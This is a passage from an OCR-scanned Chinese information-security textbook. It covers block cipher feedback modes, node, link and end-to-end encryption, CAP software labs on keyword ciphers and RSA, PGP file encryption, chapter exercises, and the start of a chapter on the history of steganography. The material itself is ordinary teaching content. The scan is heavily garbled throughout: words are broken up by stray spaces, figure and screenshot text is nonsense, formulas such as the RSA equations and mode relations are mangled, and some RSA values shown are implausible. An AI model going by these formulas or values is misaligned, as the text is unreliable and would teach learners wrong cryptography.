现 多 次 相同 的 明文 , 均 产 生 不 相同 的 密 文 ; 这 一 模式 可 以 作为 密 钥 流 生成 器 ,产生 密 钥 流 。 

密 文 反馈 模式 的 缺点 : 与 CBC 模式 的 缺点 类 似 。 

在 CFB 模式 中 ,加 密 函 数 E 和 解密 函数 D 相同 ,满足 以 下 关系 : 

Dx(*) = Ex(*) 

4. 输出 反馈 模式 

输出 反馈 (Output Feed Back,OFB) 模 式 如 图 3-22 所 示 。 该 模式 产生 与 明文 异 或 运算 
的 密 钥 流 , 从 而 产生 密 文 ,这 一 点 与 CFB 大 致 相同 ,唯一 的 差异 点 是 与 明文 分 组 进行 异 或 运 
算 的 输入 部 分 是 反复 加 密 后 得 到 的 。 


明文 分 
密 角 1 1 1 1 
加 E 、\ E ke 、\ Ek 、\ E 
初始 向 量 Ke </ 六 如 Oy 
密 文 分 
初始 向 量 
\ A NN 
Wet i DE ?2 9 
明文 分 组 


图 3-22 输出 反馈 模式 
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在 OFB 模式 中 ,加 密 函数 EE 和 解密 函数 D 相同 ,满足 以 下 关系 : 
Dx(*) = Exr(*) 


3.6.2 ”加 密 方式 


在 计算 机 网 络 中 , 既 要 保护 网 络 传 输 过 程 中 的 数据 ,又 要 保护 存储 在 计算 机 系统 中 的 数 
据 。 对 传输 过 程 中 的 数据 进行 加 密 , 称 为 “通信 和 加密”; 对 计算 机 系统 中 存储 的 数据 进行 加 
密 , 称 为 “文件 加 密 ”。 如 果 以 加 密实 现 的 通信 层次 来 区 分 ,加 密 可 以 在 通信 的 3 个 不 同 层次 
来 实现 , 即 节点 加 密 、 链 路 加 密 和 端 到 端 加 密 3 种 。 

1. 节点 加 密 

节点 加 密 是 指 对 源 节点 到 目的 节点 之 间 传 输 的 数据 进行 加 密 。 它 工作 在 OSI 参考 模 
型 的 第 一 层 和 第 二 层 ; 从 实施 对 象 来 讲 , 它 仅 对 报 文 加 密 ,而 不 对 报头 加 密 , 以 便于 传输 路 
由 根据 其 报头 的 标识 进行 选择 。 一 般 的 节点 加 密使 用 特殊 的 加 密 硬件 进行 解密 和 重 加 密 ， 
因此 ,要 保证 节点 在 物理 上 是 安全 的 ,以 避免 信息 泄露 。 

2. 链 路 加 密 

链 路 加 密 是 对 相 邻 节点 之 间 的 链 路 上 所 传输 的 数据 进行 加 密 。 它 工作 在 OSI 参考 模 
型 的 第 二 层 , 即 在 数据 链 路 层 进行 。 链 路 加 密 侧重 于 在 通信 链 路 上 而 不 考虑 信 源 和 信 宿 ,对 
通过 各 链 路 的 数据 采用 不 同 的 加 密 密 钥 提供 安全 保护 , 它 不 仅 对 数据 加 密 , 而 且 还 对 高 层 的 
协议 信息 (地 址 、 检 错 、 帧 头 帧 尾 ) 加 密 ,在 不 同 节 点 对 之 间 使 用 不 同 的 加 密 密 钥 。 但 在 节点 
处 ,要 先 对 接收 到 的 数据 进行 解密 ,获得 路 由 信息 ,然后 再 使 用 下 一 个 链 路 的 密 钥 对 消息 进 
行 加 密 , 再 进行 传输 。 在 节点 处 传输 数据 以 明文 方式 存在 。 因 此 ,所 有 节点 在 物理 上 必须 是 
安全 的 。 

3. 端 到 端 加 密 


端 到 端 加 密 是 指 为 用 户 传送 数据 提供 从 发 送 端 到 接收 端的 加 密 服务 。 它 工作 在 OSI 
参考 模型 的 第 六 层 或 第 七 层 ,由 发 送 端 自动 加 密 信息 ,并 进入 TCP/IP 数据 包 回 封 ,以 密 文 
的 形式 穿 过 互联 网 , 当 这 些 信息 到 达 目 的 地 时 ,将 自动 重组 解密 ,成 为 明文 。 端 到 端 加 密 是 
面向 用 户 的 , 它 不 对 下 层 协议 进行 信息 加 密 , 协 议 信 息 以 明文 形式 传输 ,用 户 数据 在 传输 节 
点 不 需要 解密 。 由 于 网 络 本 身 并 不 会 知道 正在 传送 的 数据 是 加 密 数据 ,因此 这 对 防止 复制 
网 络 软件 和 软件 泄露 很 有 效 。 在 网 络 上 的 每 个 用 户 可 以 拥有 不 同 的 加 密 密 钥 ,而 且 网 络 本 
身 不 需要 增添 任何 专门 的 加 密 、 解 密 设 备 。 


《ED 密码 学 实验 


密码 学 是 一 门 古老 的 科学 , 它 是 研究 密码 系统 或 通信 安全 的 一 门 科学 ,分 为 密码 编码 学 
和 密码 分 析 学 。 密 码 编码 学 的 目的 是 研究 如 何 书写 好 的 密码 方法 ,保护 信息 不 被 侦察 , 即 伪 
装 消息 。 对 给 定 的 有 意义 的 数据 进行 可 逆 的 数学 变换 ,将 其 变 为 表面 上 杂乱 无 章 的 数据 ,只 
有 合法 的 接收 者 才能 恢复 数据 。 密 码 分 析 学 是 研究 攻破 一 个 系统 的 途径 ,恢复 被 隐蔽 起 来 
的 消息 的 本 来 面目 , 即 研究 如 何 破译 加 密 的 消息 。 
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/ 实 训 目的 
. 掌握 常用 密码 算法 的 设计 思想 及 其 安全 性 原理 。 
2. 能 通过 CAP 进行 常用 密码 算法 的 演示 和 分 析 。 
/ 实 训 环境 
. 设备 : 计算 机 。 
2. 软件 : CAP 加 密 分 析 软 件 。 
/ 实 训 内 容 
. 经 典 加 密 法 演示 及 分 析 。 
2. 公 钥 加 密 法 演示 及 分 析 。 
A/ 实 训 步 村 
1. 经 典 加 密 法 演示 及 分 析 
(1) 原理 及 演示 。 首 先 , 选 择 一 个 关键 词 , 若 关键 词 中 有 重复 字母 , 则 去 除 第 一 次 出 现 
之 外 的 所 有 相同 字母 。 例 如 , 选 定 关键 词 “good”, 则 使 用 “god”。 
然后 ,将 关键 词 写 在 字母 表 下 方 ,并 用 字母 表 的 其 他 字母 按 标准 的 顺序 填写 余下 的 空 
间 , 如 表 3-12 所 示 。 


表 3-12 原 表 


显然 ,从 字母 p 开始 ,所 有 的 字母 都 不 再 蔡 换 。 为 了 消除 这 种 情况 ,可 以 允许 关键 词 从 
字母 表 的 任意 位 置 开 始 ,如 让 “god” 从 h 开始 ,如 表 3-13 所 示 。 


表 3-13 新 的 替代 表 


最 后 ,用 CAP 软件 演示 关键 词 加 密 法 。 

O@ 在 CAP 界面 中 单 击 Cipher 菜单 项 ,选择 Keyword 选项 。 在 打开 的 界面 中 输入 关键 
词 和 起 始 位 置 后 ,用 SetKey 设 定 , 可 在 下 方 看 到 对 应 的 字母 表 , 如 图 3-23 所 示 。 

@ 单 击 Encipher 标签 加 密 明 文 this is a test for cipher experiment, 即 可 在 Ciphertext 
文本 框 中 显示 密 文 ,如 图 3-24 所 示 。 

(2) 破解 。 在 进行 破解 之 前 ,需要 了 解 一 些 关键 词 加 密 法 的 重要 内 容 : 明文 是 标准 英 
语 ; 每 个 明文 字母 已 被 唯一 的 密 文 替代 。 

于 是 ,在 分 析 破 解 的 过 程 中 ,就 可 以 利用 字母 的 一 些 特性 帮助 破解 ,如 字母 出 现 的 频率 、 
与 其 他 字母 的 联系 、 在 单词 中 的 位 置 等 。( 在 标准 英语 中 ,e 是 出 现 频率 最 高 的 字母 ,而 e 和 
z 很 少 成 对 出 现 ; th、he 和 er 成 对 出 现 很 普遍 。) 
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DB: CAP Cryptographic Analysis Program v4 一 口 到 


Plaintext Ciphertext Block Ciphers Help Autosove Game Integers Random 。 Monitor 
Signatures 。 About Quit 


SimpleAnabysis 


Shift 
BKeyword Cipher 


Ca setkey Endipher Decipher Help Quit 


Enter the keyword: |next 
Sstartat [pb 


Keyword Substitution 


图 3-23 关键 词 加 密 法 Keyword 设 定 


房 CAP Cryptographic Analysis Program v4 


Plaintext Ciphertext Block Ciphers Help Autosove Game Integers Random 。 Monitor 
Signatures About Quit 


lacdndpzatpaskoedletotvltoditiq 
应 Keyword Cipher 
SetKey Encipher Decipher Help Quit 


Enter the keyword: Inext 


startat: | 


Keyword Substiution 


图 3-24 对 明文 加 密 
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2. 公 钥 加 密 法 演示 及 分 析 

(1) RSA 的 实施 。 实 施 RSA 公开 密 钥 密 码 体制 需要 以 下 步骤 。 

@ 设计 密 钥 。 仔 细 选 取 两 个 互 异 的 大 素数 户 和 qd; 令 n 二 p，g 及 nn 的 欧 拉 函数 值 
9(72) 一 (b 一 1)(dq 一 1) ,接着 寻找 两 个 正 整 数 。 和 4d ,使 其 满足 GCD(e:p(z)) 一 1,e，d 一 
1(mod gp(n))。 这 里 的 {e,n) 就 是 公开 的 加 密 密 钥 。 

@ 设计 密 文 。 把 要 发 送 的 明文 信息 数字 化 和 分 块 ,其 加 密 过 程 为 c=m* (mod n)。 

@ 恢复 明文 。 对 c 解密 ,m= 二 cd (mod n) 即 可 得 到 明文 。 

(2) CAP 软件 的 RSA 实现 。 

@ 选择 Integers 菜单 中 的 Prime Number Generation 选项 ,找到 素数 p 和 g ,如 图 3-25 
所 示 。 


启 : Long Integer Routines = 口 x 
Print SpecialFfunctions Help Quit 


Prime Number Generalion using Lehmann 
Required Number of Digits: js 后 of100 10 
Prime Number 


1223843 
[EC sw | found 


图 3-25 ”Long Integer Routines 运行 界面 


@ 计 算 n 和 gg(n)。 

@ 选取 素数 e, 该 值 比 p 值 大 ,上 且 与 (p 一 1)(g 一 1) 互 质 ; 并 在 Special Function 选项 卡 
中 的 Inverse Mod 栏 , 用 反 模 运算 得 到 私 钥 d. 如 图 3-26 所 示 。 

@ 在 Cipher 菜单 中 选择 RSA 选项 ,在 打开 的 界面 中 输入 之 前 得 到 的 公 钥 和 私 钥 , 如 
图 3-27 所 示 。 
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th 


房 Long Integer Routines - 0O 3 
Print 。 Special Functions Help Quit 


[square root of 
743813567999683764265600 


[714124267578172939 


si find the inverse of 


6013314031 


reduced MOD 


748813567999683764265600 


526095966519075512864271 
CR Saove | 


图 3-26 反 模 运算 界面 


CAP Cryptographic Analysis Program v4 = 日 


Plaintext Ciphertext Block Ciphers Help Autosove Game 。 Integers Random 。 Monitor 
Signatures About Quit 


启 RSA Cipher 
Encipher Decipher Help Quit 


Block Size: [2 Time: 
N |748813567999683764265600 


@ |626095966519075512864271 
d |6013314031 


图 3-27 CAP 软件 中 的 RSA 实现 
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< PGP 加 密 软 件 的 使 用 


PGP(Pretty Good Privacy) 是 一 个 基于 RSA 公 钥 加 密 体 系 的 邮件 加 密 软件 ,使 用 混合 
加 密 体制 加 密 。PGP 最 初 的 设计 主要 是 用 于 电子 邮件 加 密 , 如 今 已 经 发 展 到 了 可 以 加 密 整 
个 硬盘 、 分 区 文件 ,文件 夹 .邮件 软件 等 。 

/ 实 训 目的 

1. 了 解 PGP 加 密 软 件 的 基本 功能 。 

2. 加 深 对 公 钥 加 密 机 制 的 理解 。 

3. 掌握 PGP 软件 的 加 解密 文件 .签名 等 基本 操作 。 


/ 实 训 环 境 
网 络 环境 ,PGP 加 密 软件 。 


/ 实 训 内 容 

1. 安装 PGP 软件 。 

2. 练习 生成 密 钥 对 。 

3. 练习 一 般 文件 的 加 密 和 解密 。 

/ 实 训 步 了 

1. 安装 PGP 软件 

实验 使 用 的 是 PGP Desktop 10, 分 别 有 32 位 和 64 位 版 本 ,支持 Windows 2003、 
Windows 7、Windows 10,PGP 的 安装 要 求 使 用 管理 员 账 号 登录 。 

当 提 问 是 否 已 经 有 密 钥 对 时 ,本 实验 选择 “新 用 
户 ? 选 项 (如 果 已 经 有 了 自己 的 密 钥 对 ,就 不 要 选择 ) 。 
继续 按照 提示 一 步 步 安 装 , 在 安装 完成 之 后 ,需要 重 
新 启动 计算 机 ,重启 后 ,屏幕 右 下 角 的 任务 栏 上 会 出 
现 一 个 金黄 色 的 “小 锁 ”, 这 就 是 PGP 图 标 , 如 图 3-28 
所 示 。 然 后 安装 汉化 包 , 重 启 计算 机 。 

2. 创建 和 管理 PGP 的 密 钥 

要 使 用 PGP 进行 加 密 、 解 密 和 数字 签名 ,首先 必 
须 生成 一 对 属于 自己 的 密 钥 对 , 公 钥 发 送 给 其 他 人 ， 
让 其 进行 加 密 ; 私 钥 留 给 自己 用 来 解密 及 签名 。 
PGP 的 密 钥 经 过 加 密 后 保存 在 文件 中 。 

创建 密 钥 对 的 步骤 如 下 。 

(1) 如 果 在 安装 PGP 时 选择 “新 用 户 ” 选 项 , 安 图 328 PGP 某 单 
装 程序 将 自动 打开 密 钥 对 生成 向 导 。 也 可 以 通过 “ 开 
始 ” 一 “程序 ”>PGP 一 PGPkeys 命令 ,启动 PGPkeys 主 界面 ,如 图 3-29 所 示 。 选 择 “ 密 
钥 ”“ 新 建 窒 钥 ”命令 ,打开 “PGP 密 钥 生成 向 导 ” 界 面 ,如 图 3-30 所 示 。 
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PGPkeys 


PGP 密 钥 生成 向 导 


NN 


图 3-30 PGP 密 钥 生成 向 导 


(2) 在 “分 配 姓名 和 电子 邮箱 ”中 填写 自己 的 姓名 、 邮 件 地 址 。 

(3) 在 “分 配 密码 ”文本 框 中 输入 自己 的 私 钥 保 护 密码 。 在 需要 使 用 私 钥 时 输入 此 密码 
(注意 ,PGP 并 不 直接 使 用 这 个 密码 加 密 数据 ， 
并 且 可 以 更 改 这 个 密码 ,只 要 没有 生成 新 的 密 
钥 对 ,仍然 可 以 使 用 原来 的 密 钥 对 进行 文件 的 
加 密 和 解密 )。 

(4) 一 直 单 击 “ 下 一 步 ” 按 钮 直到 完成 。 这 
时 将 在 密 钥 管理 器 中 出 现 所 生成 的 密 钥 对 ,如 
图 3-31 所 示 。 

导出 公 钥 : 在 PGPKey 中 ,选择 自己 的 密 
钥 对 。 选 择 “ 密 钥 ” 一 “导出 ?命令 可 以 导出 自己 
的 公 钥 或 整个 密 钥 对 ,如 图 3-32 所 示 。 可 将 自 
己 的 公 钥 导出 到 一 个 文件 中 。 将 这 个 密 钥 对 文 图 3-31 显示 新 建 的 密 钥 
件 上 传 到 实验 室 服务 器 中 的 “PGP 公 钥 ?中 。 
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不 选 时 仅 导 
出 公 钥 。 选 
择 时 导出 密 
钥 对 


图 3-32 导出 密 钥 对 


导出 自己 的 密 钥 对 : 当 需 要 将 密 钥 对 备份 起 来 ,或 者 需要 把 密 钥 对 转移 到 另外 的 计算 
机 上 时 ,可 以 利用 导出 密 钥 对 的 功能 。 可 将 自己 的 密 钥 对 导出 到 另 一 个 文件 中 ,将 这 个 密 钥 
对 文件 保存 到 自己 的 邮箱 或 U 盘 上 。 

删除 密 钥 对 : 按 Delete 键 将 选择 的 密 钥 对 删除 。 

导入 密 钥 对 : 选择 “import” 命 令 将 刚才 导出 的 密 钥 对 重新 导入 到 密 钥 管理 器 中 。 

导入 其 他 人 的 公 钥 : 从 实验 服务 器 上 下 载 同 组 实验 同学 的 公 钥 文件 ,将 该 公 钥 导入 密 
钥 管理 器 中 。 

3. 使 用 PGP 进行 文件 的 加 密 和 解密 

(1) 创建 一 个 文本 文件 test. txt, 要 包含 以 下 内 容 。 注 意 ,用 学 生 自己 的 学 号 、 姓 名 、 邮 
件 地 址 替换 相应 的 内 容 。 


姓名 : 张 三 
学 号 : 2974329923 
邮件 地 址 : zhang3@sise. com. cn 


PGP is based on a widely accepted _ encryption technology known as public key 


cryptography in which two complementary keys 一 a keypair 一 are used to maintain 


secure communications。 


(2) 选择 PGP 菜单 中 的 PGPmail 选项 ,打开 PGPmail 页 面 , 如 图 3-33 所 示 。 


图 3-33 PGPmail 


(3) 选择 创建 的 文本 文件 test. txt, 如 图 3-34 所 示 。 
(4) 用 刚才 导入 的 公 钥 进行 加 密 ,将 加 密 后 的 文件 重 命名 为 testl. txt. pgp, 如 图 3-35 
所 示 。 
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风 


aownloadtask 
BFinePrint files 
Dy Virtual machines 初 057% 听 
POP en 
请 |2005831 
(| 稼 Boo2.， 
选择 需要 加 - 性 


Ol File: & *) -| 取消 


图 3-34 PGPmail 选择 待 加 密 的 文件 


EL 


2048/1024 
E222 <222@123.com> 包 ”2043/1024 
[Etianhz <thz@sise.com.cn> O2048/1024 


一 些 接收 人 密 钥 不 再 有 效 , 请 检查 这 些 接收 人 是 有 效 的 


shiyan <shiyan@s.com> 2048 


取消 (CO | Tw) | 


收 件 人 : 从 上 面 列 委 
加 密 所 用 的 公 | 王 实 直 往 出 四 
厂 输入 文本 QD 


厂 业 碎 原件 

厂 安全 查看 器 (5 
7 芝 现 声 训 人) 

厂 自 解 密 文 档 (D) 


3-35 用 导入 的 公 钥 进行 加 密 


将 用 来 加 密 的 公 钥 或 密 钥 对 拖 入 Recipients 栏 ,其 他 不 需要 的 拖 出 去 。 
(5) 解密 文件 , 先 双 击 生 成 的 加 密 文件 “testl. txt. pgp”, 要 求 输入 密 钥 的 密码 ,如 图 3-36 
所 示 。 


P6P 输入 窗 码 


输入 密码 ,为 解密 : 


> 


图 3-36 解密 文件 


(6) 输入 正确 的 密码 后 ,就 可 以 解密 原来 的 文件 了 。 
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本 章 小 结 


(1) 密码 学 的 发 展 大 致 经 历 了 手工 加 密 阶 段 、 机 械 加 密 阶 段 和 计算 机 加 密 阶 段 。 密 码 
技术 是 现代 信息 安全 的 基础 和 核心 技术 , 它 不 仅 能 够 对 信息 加 密 , 还 能 完成 信息 的 完整 性 验 
证 数字 签名 和 身份 认证 等 功能 。 按 加 密 密 钥 和 解密 密 钥 是 否 相 同 ,密码 体制 可 分 为 对 称 密 
码 体制 和 非 对 称 密码 体制 。 对 称 密码 体制 又 可 分 为 序列 密码 和 分 组 密码 。 

(2) 替代 密码 和 置换 密码 等 是 常用 的 古典 密码 案例 ,虽然 在 现代 科技 环境 下 已 经 过 时 ， 
但 它们 包含 的 最 基本 的 变换 移 位 和 代替 在 现代 分 组 密码 设计 中 仍然 是 最 基本 的 变换 。 

(3) 对 称 密码 体制 要 求 加 密 .解密 双方 拥有 相同 的 密 钥 ,其 特点 是 加 密 速度 快 、 软 /硬件 
容易 实现 ,通常 用 于 传输 数据 的 加 密 。 常 用 的 加 密 算法 有 DES 算法 等 。 

(4) 非 对 称 密码 体制 的 加 密 密 钥 和 解密 密 钥 是 不 相同 的 。 非 对 称 密码 被 用 作 加 密 时 ， 
使 用 接收 者 的 公开 密 钥 ,接收 方 用 自己 的 私有 密 钥 解密 ;用 作 数字 签名 时 ,使 用 发 送 方 (签名 
人 ) 的 私有 密 钥 加 密 ( 或 称 为 签名 ) ,接收 方 (或 验证 方 ) 收 到 签名 时 使 用 发 送 方 的 公开 密 钥 验 
证 。 常 用 的 算法 有 RSA 密码 算法 .Diffie Hellman 密 钥 交 换算 法 、.EIGamal 加 密 算法 等 。 

(5) 加 密 可 以 用 通信 的 3 个 不 同 层次 来 实现 , 即 节点 加 密 、 链 路 加 密 和 端 到 端 加 密 。 节 
点 加 密 是 指 对 源 节点 到 目的 节点 之 间 传 输 的 数据 进行 加 密 , 不 对 报头 加 密 ; 链 路 加 密 在 数 
据 链 路 层 进 行 ,是 对 相 邻 节点 之 间 的 链 路 上 所 传输 的 数据 进行 加 密 , 在 节点 处 ,传输 数据 以 
明文 形式 存在 .侧重 于 在 通信 和 链 路 上 而 不 考虑 信 源 和 信和 宿 ; 端 到 端 加 密 是 对 源 端 用 户 到 目 
的 端 用 户 的 数据 提供 保护 ,传输 数据 在 传输 过 程 中 始终 以 密 文 形式 存在 。 


. 简 述 密码 学 的 发 展 历程 。 
. 简 述 对 称 密码 体制 和 非 对称 密 码 体制 的 优 缺 点 。 
. 简 述 柯 克 霍 夫 原 则 。 
. 描述 DES 数据 加 密 算法 的 流程 。 
. 设 明 文 为 “visit beijing tomorrow”, 密 钥 为 “enjoy”, 试 用 Vigenere 算法 对 其 加 密 。 
6. 在 Alice 和 Bob 的 保密 通信 中 ,传送 的 密 文 是 “rjjy rj ts ymj xfggfym bj bnqq 
inxhzxxymj uqfs”, 如 果 他 们 使 用 的 是 移 位 密码 算法 , 试 解密 其 通信 和 内容。 
7. 在 一 个 使 用 RSA 的 公开 密 钥 系统 中 , 若 截获 了 发 给 一 个 其 公开 密 钥 e 一 5 .xz 一 35 的 
用 户 的 密 文 C 王 10, 则 明文 M 是 什么 ? 
8. 简 述 EIGamal 加 密 算法 。 


an 由 oo 性 
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信息 隐藏 (Information Hiding) 作 为 一 门 新 兴 的 交叉 学 科 , 伴 随 着 信息 和 网 络 技术 的 飞 
速 发 展 ,在 隐蔽 通信 ,数字 版 权 保护 等 方面 起 着 越 来 越 重 要 的 作用 。 信 息 隐 藏 是 将 秘密 信息 
隐藏 在 另 一 非 机 密 的 载体 信息 中 ,通过 公共 信道 进行 传递 。 秘 密 信息 被 隐藏 后 ,攻击 者 无 法 
判断 载体 信息 中 是 否 隐 藏 了 秘密 信息 ,也 无 法 从 载体 信息 中 提取 或 去 除 所 隐藏 的 秘密 信息 。 
信息 隐藏 技术 研究 的 内 容 包 括 信息 隐藏 算法 .数字 水 印 、 隐 通道 技术 和 匿名 通信 技术 等 。 


4.1 信息 隐藏 的 发 展 历史 


4.1.1 传统 的 信息 隐藏 技术 


古代 信息 隐藏 的 方法 可 以 分 为 两 种 : 一 种 是 将 机 密 信 息 进 行 各 种 变换 ,使 非 授 权 者 无 
法 理解 ,这 就 是 密码 术 ; 另 一 种 是 将 机 密 信息 隐藏 起 来 ,使 非 授权 者 无 法 获取 ,如 隐 写 术 等 。 
可 以 称 它们 为 古代 密码 术 和 古代 隐 写 术 。 可 以 把 它们 的 发 展 看 成 两 条 线 : 一 条 是 从 古代 密 
码 术 到 现代 密码 学 ; 另 一 条 是 从 古代 隐 写 术 到 信息 隐藏 技术 。 

古代 隐 写 术 包 括 技术 性 的 隐 写 术 .语言 学 中 的 隐 写 术 和 用 于 版 权 保护 的 隐 写 术 。 

1. 技术 性 的 隐 写 术 

技术 性 的 隐 写 术 由 来 已 入 。 大 约 在 公元 前 440 年 , 隐 写 术 就 已 经 被 应 用 了 。 据 古 希 腊 
历史 学 家 希 罗 多 德 记 载 ,一 位 希腊 贵族 希 斯 泰 乌 斯 (Histiaus) 为 了 安全 地 把 机 密 信息 传送 
给 米利 都 的 阿里 斯 塔 格 鲁 斯 , 众 惠 他 起 兵 反 叛 波斯 人 , 想 出 一 个 绝妙 的 主意 : 剃 光 送 信 奴 隶 
的 头 ,在 头顶 上 写 下 密 信 ,等 他 的 头发 重新 长 出 来 ,就 将 他 派 往 米利 都 送信 。 类 似 的 方法 在 
20 世纪 初期 仍然 被 德国 间谍 所 使 用 。 实 际 上 , 隐 写 术 自 古 以 来 就 一 直 被 人 们 广泛 地 使 用 。 
隐 写 术 的 经 典 手 法 很 多 ,下 面 仅 列举 一 些 例子 。 

(1) 使 用 不 可 见 黑 水 给 报纸 上 的 某 些 字母 作 上 标记 来 向 间谍 发 送 消息 。 

(2) 在 一 个 录音 带 的 某 些 位 置 上 加 一 些 不 易 察 觉 的 回声 。 

(3) 将 消息 写 在 木板 上 ,然后 用 石灰 水 把 它 刷 白 。 

(4) 将 信函 隐藏 在 信使 的 鞋底 里 或 妇女 的 耳 饰 中 。 

(5) 由 信 徊 携带 便条 传送 消息 。 

(6) 通过 改变 字母 笔画 的 高 度 或 在 掩蔽 文体 的 字母 上 面 或 下 面 挖 出 非常 小 的 小 孔 ( 或 
用 无 形 的 墨水 印 制作 非常 小 的 斑点 ) 来 隐藏 正文 。 

(7) 在 纸 上 打 印 各 种 小 像素 点 组 成 的 块 来 对 诸如 日 期 .打印 机 进行 标识 ,将 用 户 标 识 符 
等 信息 进行 编码 。 

(8) 将 秘密 消息 隐藏 在 大 小 不 超过 一 个 句号 或 小 墨水 点 的 空间 里 。 

(9) 将 消息 隐藏 在 微缩 胶片 中 。 
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(10) 把 在 显微镜 下 可 见 的 图 像 隐 藏 在 耳 打 、 鼻 孔 及 手指 甲 里 ; 或 者 先 将 间谍 之 间 要 传 
送 的 消息 经 过 若干 照相 缩影 步骤 后 缩小 到 微粒 状 , 然 后 粘 在 无 关 紧 要 的 杂志 等 文字 材料 中 
的 句号 或 逗号 上 。 

(11) 在 印刷 旅行 支票 时 使 用 特殊 紫外 线 荧光 墨水 。 

(12) 制作 特殊 的 雕塑 或 绘画 作品 ,使 得 从 不 同 角 度 看 会 显示 出 不 同 的 影像 。 

(13) 利用 掩蔽 材料 的 预定 位 置 上 的 某 些 误差 和 风格 特性 来 隐藏 消息 。 例 如 ,利用 字 
的 标准 体 和 和 斜体 来 进行 编码 ,从 而 实现 信息 隐藏 ; 将 版 权 信息 和 序列 号 隐藏 在 行 间 距 和 
文档 的 其 他 格式 特性 之 中 ; 通过 对 文档 的 各 行 提升 或 降低 三 百 分 之 一 英寸 来 表示 0 或 
1 等 。 

2. 语言 学 中 的 隐 写 术 

语言 学 中 的 隐 写 术 也 是 被 广泛 使 用 的 一 种 方法 。 最 具 代 表 性 的 是 “ 藏 头 诗 ”, 作 者 把 表 
明 真 情 实意 的 字句 分 别 藏 人 诗句 之 中 。 如 电影 (唐伯虎 点 秋香 》 中 唐伯虎 的 藏 头 诗 一 一 我 画 
蓝 江 水 悠悠 , 爱 晚 亭 上 枫叶 愁 。 秋 月 溶 溶 照 佛寺 ,香烟 扫 披 绕 经 楼 。 这 一 “我 爱 秋香 ”的 藏 头 
诗句 已 成 经 典 。 又 如 绍兴 才子 徐 文才 在 杭州 西湖 赏 月 时 挥毫 写 下 的 一 首 七 言 绝句 一 一 平湖 
一 色 万 需 秋 , 湖 光 渺 渺 水 长 流 。 秋 月 圆 圆 世 间 少 ,月 好 四 时 最 宜 秋 。 每 句 的 第 一 个 字 连 起 来 
正好 是 “平湖 秋月 ”。 我 国 还 有 一 种 很 有 趣 的 信息 隐藏 方法 , 即 消息 的 发 送 者 和 接收 者 各 有 
一 张 完 全 相同 的 带 有 许多 小 孔 的 掩蔽 纸张 ,而 这 些小 孔 的 位 置 是 被 随机 选择 并 鹤 穿 的 。 发 
送 者 将 掩蔽 纸张 放 在 一 张 纸 上 ,将 秘密 消息 写 在 小 孔 位 置 上 , 移 去 掩蔽 纸张 ,然后 根据 纸张 
上 留 下 的 字 和 空格 编写 一 篇 掩饰 性 的 文章 。 接 收 者 只 要 把 掩蔽 纸张 覆盖 在 该 纸张 上 就 可 立 
即 读 出 秘密 消息 。 直 到 16 世纪 早期 ,意大利 数学 家 卡 登 (Cardan) 重 新 发 展 了 这 种 方法 ,该 
方法 现在 被 称 为 卡 登 格子 隐藏 法 。 国 外 著名 的 例子 是 乔 万 尼 ， 薄 伽 丘 (Giovanni 
Boccaccio) 创 作 的 Amorosa Visione ,据说 是 世界 上 最 长 的 藏 头 诗 ,他 先 创 作 了 三 首 十 四 行 
诗 , 总 共 包 含 大 约 1500 个 字母 ,然后 创作 另外 一 首 诗 ,使 连续 三 行 押韵 诗句 的 第 一 个 字母 恰 
好 对 应 十 四 行 诗 的 各 字母 。 

3. 用 于 版 权 保护 的 隐 写 术 

版 权 保护 与 侵权 的 斗争 从 古 到 今 一 直 在 延续 着 。 克 罗 德 。 洛 林 (Claude Lorrain) 是 17 
世纪 法 国 很 有 名 的 画家 ,当时 出 现 了 很 多 模仿 和 假冒 他 的 画 ,他 使 用 了 一 个 特殊 的 方法 来 保 
护 画 的 版 权 。 他 自己 创作 了 一 本 称 为 Liber Veritatis 的 素描 集 的 书 , 它 的 页 面 是 交替 出 现 
的 ,四 页 蓝 色 后 紧 接 着 四 页 白色 ,不 断 重复 ,大 约 包含 195 幅 画 。 事 实 上 ,只 要 在 素描 和 油画 
作品 之 间 进 行 一 些 比较 就 会 发 现 , 前 者 是 专门 设计 用 来 作为 后 者 的 “校对 校 验 图 ”, 并 且 任 何 
一 个 细心 的 观察 者 根据 这 本 书 仔细 对 照 后 就 能 判断 所 给 的 油画 是 不 是 厢 品 。 我 国 是 最 早 发 
明 印 刷 术 的 国家 ,而 且 许 多 西方 国家 也 承认 印刷 术 来 自 中 国 。 书 籍 作为 流通 的 商品 且 利润 
丰厚 ,在 漫长 的 岁月 中 不 进行 版 权 保护 是 无 法 想象 的 ,也 是 不 符合 事实 的 。 从 法 令 来 看 , 北 
宋 哲 宗 绍 圣 年 间 (1095 年 ) 已 有 “ 盗 印 法 ”, 中 国 自 宋代 就 确 有 版 权 保护 的 法 令 。 从 实物 来 
看 ,现存 宋代 书籍 中 可 以 证 实 版 权 问题 。 如 眉山 程 伟人 宅 刊 本 《 东 都 事略 》, 其 牌 记 有 “眉山 
程 舍 人 宅 刊行 ,已 申 上 司 ,不 许 覆 板 ”。 这 就 相当 于 “版 权 所 有 ,不 准 翻印 *"。1709 年 英国 国 
会 制定 的 “ 圣 安 妮 的 法 令 ” 承 认 作者 是 受 保护 的 主体 ,这 被 认为 是 第 一 部 “版 权 法 ”。 
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4.1.2 数字 信息 隐藏 技术 的 发 展 


1992 年 ,国际 上 正式 提出 信息 隐藏 的 概念 ; 1996 年 ,在 英国 剑桥 大 学 牛顿 研究 所 召开 
了 第 一 届 信 息 隐藏 学 术 会 议 , 标 志 着 信息 隐藏 学 的 正式 诞生 。 此 后 ,国际 信息 隐藏 学 术 会 议 
在 欧美 各 国 相继 召开 。 

作为 隐秘 通信 和 知识 产权 保护 等 的 主要 手段 ,信息 隐藏 学 ”被 提出 后 引起 了 各 国政 府 、 
大 学 和 研究 机 构 的 重视 ,取得 了 巨大 的 发 展 。 美 国 的 麻 省 理工 学 院 、 普 渡 大 学 ,英国 的 剑桥 
大 学 ,NEC 研究 所 ,IBM 研究 院 都 进行 了 大 量 的 研究 。 在 国内 ,许多 高 等 院 校 和 研究 机 构 也 
对 信息 隐藏 技术 进行 了 深入 的 研究 。1999 年 12 月 ,我国 召 开 首 届 全 国信 息 隐 藏 暨 多 媒体 
信息 安全 学 术 大 会 (CIHW) 。 全 国信 息 隐藏 会 议 旨 在 为 该 领域 的 研究 人 员 提 供 一 个 交流 新 
思想 .新 方法 、 新 技术 的 学 术 平 台 ,截至 2018 年 5 月 已 经 成 功 举 办 了 14 届 , 极 大 地 推动 了 我 
国信 息 隐 藏 研究 的 发 展 。2000 年 1 月 由 国家 “863” 计 划 智 能 计算 机 专家 组 和 中 国 科学 院 自 
